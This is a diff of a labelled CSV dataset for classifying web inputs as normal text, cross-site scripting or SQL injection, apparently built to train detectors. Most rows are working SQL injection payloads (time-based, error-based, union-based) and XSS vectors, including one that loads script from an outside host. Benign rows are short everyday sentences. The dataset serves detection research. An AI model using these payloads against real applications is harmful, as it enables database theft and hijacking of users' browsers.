--",2,SQLi,15168 -<dir id=x tabindex=1 onfocusin=alert(1)></dir>,1,XSS,3452 -or sleep 5,2,SQLi,11236 -Create a map.,0,normal,23045 -1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and 'dgvg' = 'dgvg,2,SQLi,16466 -"<style>@keyframes x{}</style><select style=""animation-name:x"" onanimationend=""alert(1)""></select>",1,XSS,2222 -1%' ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( '%' = ',2,SQLi,18313 -ORDER BY 13,2,SQLi,10352 -"<a href=""javascript:alert(1)"" onmouseover=alert(1)>INJECTX HOVER</a>",1,XSS,9881 -"1"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""abcm"" like ""abcm",2,SQLi,22123 -"<style>@keyframes slidein {}</style><template style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></template>",1,XSS,6660 -1' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 'qfxg' = 'qfxg,2,SQLi,22518 --9456%' ) ) ) order by 1#,2,SQLi,22623 -"1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and 'zlxw' = 'zlxw",2,SQLi,17855 -"1"" ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""hkjm"" like ""hkjm",2,SQLi,12443 -select * from users where id = 1 % ( \ ) or 1 = 1 -- 1,2,SQLi,12036 -"&lt;META HTTP-EQUIV=\""refresh\"" CONTENT=\""0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\""",1,XSS,951 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ( '%' = ',2,SQLi,21419 -select * from users where id = 1 % ( $ ) or 1 = 1 -- 1,2,SQLi,11949 -<div onpointerover=alert(1)>XSS</div>,1,XSS,3756 -<sCriPt/src=//14.rs?,1,XSS,9234 -"select * from users where id = 1 or ""& ( "" or 1 = 1 -- 1",2,SQLi,11461 -"1' ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'xonc' = 'xonc",2,SQLi,18047 -"-4413%' ) ) union all select 1345,1345#",2,SQLi,20929 -select ( case when ( 4996 = 1734 ) then 1 else 4996* ( select 4996 from master..sysdatabases ) end ) --,2,SQLi,18608 --4219' or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,22385 -"{""id"":null,""name"":""cent""}",0,normal,26050 -1 ) as bidc where 5268 = 5268 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,19442 -"<link draggable=""true"" ondragleave=""alert(1)"">test</link>",1,XSS,7568 -"-8982' in boolean mode ) union all select 5367,5367,5367,5367,5367,5367#",2,SQLi,12426 -"select * from users where id = 1 or ""?;"" or 1 = 1 -- 1",2,SQLi,11814 -ORDER BY 19#,2,SQLi,10327 -<textarea onbeforecut=alert(1) autofocus>XSS</textarea>,1,XSS,8268 -"<p onpaste=""alert(1)"" contenteditable>test</p>",1,XSS,8871 -"1 ) ) ) union all select null,null,null,null#",2,SQLi,22381 -") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337""=""1337",2,SQLi,11269 -Select shift.,0,normal,24938 -"1' ) ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( 'bmzj' like 'bmzj",2,SQLi,19039 --4901 ) or 3407 = 6442#,2,SQLi,18691 -Modify the website layout.,0,normal,22770 -"-4012"" ) or make_set ( 9354 = 9354,7185 ) and ( ""ccfn"" = ""ccfn",2,SQLi,15730 -"<sup onmouseout=""alert(1)"">test</sup>",1,XSS,2214 -"select * from users where id = 1 +\. union select null,@@VERSION -- 1",2,SQLi,11890 -""") and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11089 -"{""id"":null,""name"":""wheat""}",0,normal,26033 -"1"" ) ) as paep where 8947 = 8947 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,18056 --4157' ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'rdhm' = 'rdhm,2,SQLi,17982 -Select upload.,0,normal,24775 -1' ) where 5871 = 5871,2,SQLi,13543 -Let's discuss where to go for the team outing.,0,normal,24041 -<textarea autofocus onfocusin=alert(1)>test</textarea>,1,XSS,3116 -"-5124'+ ( select 'xpww' where 1752 = 1752 union all select 1752,1752,1752,1752,1752,1752,1752,1752,1752,1752--",2,SQLi,14279 -"<figure ondblclick=""alert(1)"">test</figure>",1,XSS,7105 -"<noframes ondblclick=""alert(1)"">test</noframes>",1,XSS,6420 -<svg><set onend=alert(1) attributename=x dur=1s>,1,XSS,6138 -1 ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,20321 -"-2102' where 3644 = 3644 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,20620 -"1' ) as mmhe where 2142 = 2142 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,22281 -"1' ) where 5883 = 5883 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,15562 +"Select ""Sort left to right"" to alphabetize by row instead.",0,normal,25633 +"<embed onbeforecut=""alert(1)"" contenteditable>test</embed>",1,XSS,8688 +"1%"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""%"" = """,2,SQLi,20511 +Sort the books.,0,normal,22803 +1'+ ( select shec where 3589 = 3589 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ) +',2,SQLi,15497 +"1%"" and 6408 = 7959--",2,SQLi,14324 +"<title oncopy=""alert(1)"" contenteditable>test</title>",1,XSS,6474 +Select a topic for a research paper.,0,normal,23970 +"1'|| ( select 'jonh' from dual where 2415 = 2415 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,21774 +"-3017"" ) ) as ljit where 9128 = 9128 union all select 9128,9128,9128,9128,9128--",2,SQLi,18700 +I need to decide where to go for a day trip.,0,normal,23708 +-7453' ) ) ) or 8571 = 8571--,2,SQLi,14112 +Select the right lens for the shot.,0,normal,24076 +"iif ( 4638 = 8258,1,1/0 )",2,SQLi,15210 +Select the correct answer from the options.,0,normal,24010 +"select * from users where id = '1'<@$$ union select 1,version ( ) -- 1'",2,SQLi,11914 +=+ SLEEP(10) + ',2,SQLi,22465 +"1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'ebuo' = 'ebuo",2,SQLi,18206 +"1' ) where 9951 = 9951 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,13953 +"<audio onbeforecopy=""alert(1)"" contenteditable>test</audio>",1,XSS,8478 +Choose and then select.,0,normal,24227 +Catch The Book Of Henry in select theaters June 16!,0,normal,26247 +<img src ?itworksonchrome?\/onerror = alert(1),1,XSS,867 +"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ( 1105 = 1105",2,SQLi,14276 +<button onfocusout=alert(1) id=x></button><input autofocus>,1,XSS,1980 +"-1631%"" ) or elt ( 8285 = 1709,1709 ) and ( ""%"" = """,2,SQLi,14035 +"1"" ) ) as daqd where 4390 = 4390 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,14583 +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>,1,XSS,863 +"1'+ ( select cjcp where 2590 = 2590 union all select null,null,null,null,null,null,null#",2,SQLi,14315 +did you select the correct one,0,normal,26196 +-9191' ) as qtvm where 2838 = 2838 or ( 8459 = 8459 ) *4906--,2,SQLi,17173 +1'|| ( select 'ldad' where 6146 = 6146 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) ) ||',2,SQLi,21475 +"Elijah Cummings, the top Democrat on the select Committee on Benghazi, said Kendall's response simply ""confirms what we all knew."" ""Secretary Clinton already produced her official records to the State Department, that she did not keep her personal emails, and that the select Committee has already obtained her emails relating to the attacks in Benghazi,"" he said.",0,normal,26173 +"<style>@keyframes x{}</style><object style=""animation-name:x"" onanimationend=""alert(1)""></object>",1,XSS,5976 +"<figure ondblclick=""alert(1)"">test</figure>",1,XSS,7086 +Select a dish from the menu.,0,normal,24156 +<html onblur=alert(1) tabindex=1 id=x></html><input autofocus>,1,XSS,3700 +"<FRAMESET><FRAME SRC=\""javascript:alert('XSS');\""></FRAMESET>",1,XSS,1256 +"><h1><IFRAME width=""420"" height=""315"" frameborder=""0"" onmouseover=""document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr",1,XSS,1202 +1 ) where 9860 = 9860 and 4443 = 4111--,2,SQLi,12614 +How did you select which women to feature in the documentary?,0,normal,26037 +"1' ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,21660 +"<content onkeyup=""alert(1)"" contenteditable>test</content>",1,XSS,4470 +"1 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13741 +1 ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 3530 = 3530,2,SQLi,15532 +<ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby>,1,XSS,6649 +<svg/onload=alert`INJECTX`>,1,XSS,9797 +"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( 'pnst' = 'pnst",2,SQLi,19480 +Select your iCloud account in the pane on the left.,0,normal,25530 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""%"" = """,2,SQLi,15970 +"<div draggable=""true"" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>",1,XSS,2682 +"-4044%"" or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ""%"" = """,2,SQLi,16613 +-3867%' ) or 3084 = 5633 and ( '%' = ',2,SQLi,21908